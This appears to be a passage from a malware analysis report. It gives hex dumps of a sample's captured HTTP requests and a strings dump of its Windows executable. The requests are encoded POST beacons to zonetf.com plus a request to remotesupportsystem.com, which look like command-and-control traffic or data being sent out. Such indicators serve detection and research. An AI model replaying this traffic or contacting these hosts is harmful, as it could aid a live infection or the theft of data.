0x00000250 (00592)   7137656a 31504451 62535930 44695442   q7ej1PDQbSY0DiTB
0x00000260 (00608)   6a6e4d39 38335447 46324854 6b436c38   jnM983TGF2HTkCl8
0x00000270 (00624)   6b4f6439 6b4d7233 4d526b33 47305037   kOd9kMr3MRk3G0P7
0x00000280 (00640)   71333379 35702532 4245504b 30535478   q33y5p%2BEPK0STx
0x00000290 (00656)   6f253246 78722532 46764b6c 4450714c   o%2Fxr%2FvKlDPqL
0x000002a0 (00672)   39563679 464a327a 5a45695a 74333525   9V6yFJ2zZEiZt35%
0x000002b0 (00688)   32424377 6e77365a 33617242 50677967   2BCwnw6Z3arBPgyg
0x000002c0 (00704)   624b4a56 486c6378 786d5a35 6552486f   bKJVHlcxxmZ5eRHo
0x000002d0 (00720)   735a2048 5454502f 312e300d 0a436f6e   sZ HTTP/1.0..Con
0x000002e0 (00736)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000002f0 (00752)   486f7374 3a207265 6d6f7465 73757070   Host: remotesupp
0x00000300 (00768)   6f727473 79737465 6d2e636f 6d0d0a41   ortsystem.com..A
0x00000310 (00784)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000320 (00800)   2d416765 6e743a20 6f706572 612f382e   -Agent: opera/8.
0x00000330 (00816)   31310d0a 0d0a                         11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6574 662e636f 6d0d0a55 7365722d   onetf.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a0d 0a0d0a33 20202077 7149386a   .......3   wqI8j
0x00000160 (00352)   5a6c6b31 4d573445 334c330a            Zlk1MW4E3L3.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a74   OhLgjh8sG%2BcoJt
0x000000c0 (00192)   58253242 534e7731 4b763937 35586c6d   X%2BSNw1Kv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a0d 0a6f4b67 66526539   ose......oKgfRe9
0x00000160 (00352)   39553152 7a636d6f 7475726e 4f335376   9U1RzcmoturnO3Sv
0x00000170 (00368)   25324649 30454766 7276616f 41673144   %2FI0EGfrvaoAg1D
0x00000180 (00384)   6a597349 66473849 4d786c57 48563748   jYsIfG8IMxlWHV7H
0x00000190 (00400)   66523631 5241614b 336e6a37 38504453   fR61RAaK3nj78PDS
0x000001a0 (00416)   54796478 70636c55 584b7157 64577933   TydxpclUXKqWdWy3
0x000001b0 (00432)   4d574d63 43426958 62544f70 6d7a7546   MWMcCBiXbTOpmzuF
0x000001c0 (00448)   57543758 36595746 77386b31 56776350   WT7X6YWFw8k1VwcP
0x000001d0 (00464)   25324646 6545764d 48504238 43366d56   %2FFeEvMHPB8C6mV
0x000001e0 (00480)   686c5544 73443846 356c394f 38375873   hlUDsD8F5l9O87Xs
0x000001f0 (00496)   6858696e 59314173 77355172 6f336b39   hXinY1Asw5Qro3k9
0x00000200 (00512)   4334324b 59375771 7a376e4b 61774c53   C42KY7Wqz7nKawLS
0x00000210 (00528)   6f596345 6933646e 4864776d 6f6e4a7a   oYcEi3dnHdwmonJz
0x00000220 (00544)   35496976 704b774f 76505832 6c646170   5IivpKwOvPX2ldap
0x00000230 (00560)   6161566b 69547548 78444a31 70543725   aaVkiTuHxDJ1pT7%
0x00000240 (00576)   32427664 42384531 7a365471 7a63474a   2BvdB8E1z6TqzcGJ
0x00000250 (00592)   7137656a 31504451 62535930 44695442   q7ej1PDQbSY0DiTB
0x00000260 (00608)   6a6e4d39 38335447 46324854 6b436c38   jnM983TGF2HTkCl8
0x00000270 (00624)   6b4f6439 6b4d7233 4d526b33 47305037   kOd9kMr3MRk3G0P7
0x00000280 (00640)   71333379 35702532 4245504b 30535478   q33y5p%2BEPK0STx
0x00000290 (00656)   6f253246 78722532 46764b6c 4450714c   o%2Fxr%2FvKlDPqL
0x000002a0 (00672)   39563679 464a327a 5a45695a 74333525   9V6yFJ2zZEiZt35%
0x000002b0 (00688)   32424377 6e77365a 33617242 50677967   2BCwnw6Z3arBPgyg
0x000002c0 (00704)   624b4a56 486c6378 786d5a35 6552486f   bKJVHlcxxmZ5eRHo
0x000002d0 (00720)   735a2048 5454502f 312e300d 0a436f6e   sZ HTTP/1.0..Con
0x000002e0 (00736)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000002f0 (00752)   486f7374 3a207265 6d6f7465 73757070   Host: remotesupp
0x00000300 (00768)   6f727473 79737465 6d2e636f 6d0d0a41   ortsystem.com..A
0x00000310 (00784)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000320 (00800)   2d416765 6e743a20 6f706572 612f382e   -Agent: opera/8.
0x00000330 (00816)   31310d0a 0d0a                         11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 46383225 3242636f   OhLgjh%2F82%2Bco
0x000000c0 (00192)   4a755825 3242534e 78623579 676d3143   JuX%2BSNxb5ygm1C
0x000000d0 (00208)   346c4b76 39373558 6c6d3547 20485454   4lKv975Xlm5G HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6574662e 636f6d0d 0a557365 722d4167   etf.com..User-Ag
0x00000100 (00256)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000110 (00272)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000120 (00288)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000130 (00304)   4e542035 2e31290d 0a436f6e 74656e74   NT 5.1)..Content
0x00000140 (00320)   2d4c656e 6774683a 20300d0a 436f6e6e   -Length: 0..Conn
0x00000150 (00336)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x00000160 (00352)   0a6c6b31 4d573445 334c330a            .lk1MW4E3L3.


Strings
.
z
.
 
 G
m7
040904b0
1520
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
2~W_&f
]3iu[a
.4|}nG
6%	Gvk
6;iiIg
6[Wk:2
7m5]}8
7}[N|{
}8~e&u
 8O>]DgT<
+8+Tz~h
ADVAPI32.dll
AMGetErrorTextW
];'aW_
biDrVN
c1g	KO
ClearCommError
CloseHandle
CLSIDFromString
CoCreateInstance
CoFreeUnusedLibraries
CoInitialize
CoInitializeEx
CopyRect
CoRegisterClassObject
CoRevokeClassObject
CoTaskMemAlloc
CoTaskMemFree
CoUninitialize
CreateEventA
CreateFiberEx
CreateItemMoniker
CreateStreamOnHGlobal
CreateThread
CreateWindowExA
@">D^2
@.data
DeleteCriticalSection
DestroyWindow
D_G>9k
DispatchMessageA
Dr8xoi
EnterCriticalSection
EnumResourceNamesA
e/Q[ni
e@Y9yw^
f0Y/@i
FatalExit
;G:+4n!
GetACP
GetCurrentProcessId
GetMessageA
GetQueueStatus
GetRunningObjectTable
GetSystemTimeAsFileTime
GetVersionExA
H6nJI(
H;8>Zz
i(drUs
iG!r?C
`iic)~
InitializeCriticalSection
iuhi[1
*|^jJ5Z
jKJY\>6
JRichu
Jz@kN'
K8|4HK
KERNEL32.dll
k?*h=S
K*\lH\e
kS*}dn
K}<	vn
LeaveCriticalSection
/L-MV1^
LoadStringA
LocalFree
:~MCK<j
_->Mivm
MonitorFromWindow
MsgWaitForMultipleObjects
M=|.Tk=
n7mKwmD
nW~T$m
n^Y0Ql=N
OED3B-U
ole32.dll
PeekMessageA
PostThreadMessageA
[&qjLb
)qkuxl\+
QUARTZ.dll
%~~r6}
`.rdata
RegCloseKey
RegCreateKeyA
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegisterClassA
RegisterWindowMessageA
RegOpenKeyExA
RegQueryValueExA
RegSetValueA
RegSetValueExA
ResumeThread
rPa?;g
SetEvent
SHELL32.dll
SHGetSpecialFolderPathA
SPv?0I
StringFromCLSID
StringFromGUID2
t4	#mh
 T];A%U
!This program cannot be run in DOS mode.
timeBeginPeriod
timeEndPeriod
timeGetDevCaps
timeGetTime
tMi<+c
ttZ5;R
tyG-Y+
tyK{W#
USER32.dll
-v)+Bk9l
VT_	|4
WaitForSingleObject
WhJUd*
WINMM.dll
W{\L.Gf;
wsprintfA
wvsprintfA
W&y;2"
x-J8z'
[}xwJ"
xwx=lS
;xY(iY
Y7+H,6
Yk<oi2
;ywhQU
z*5`}b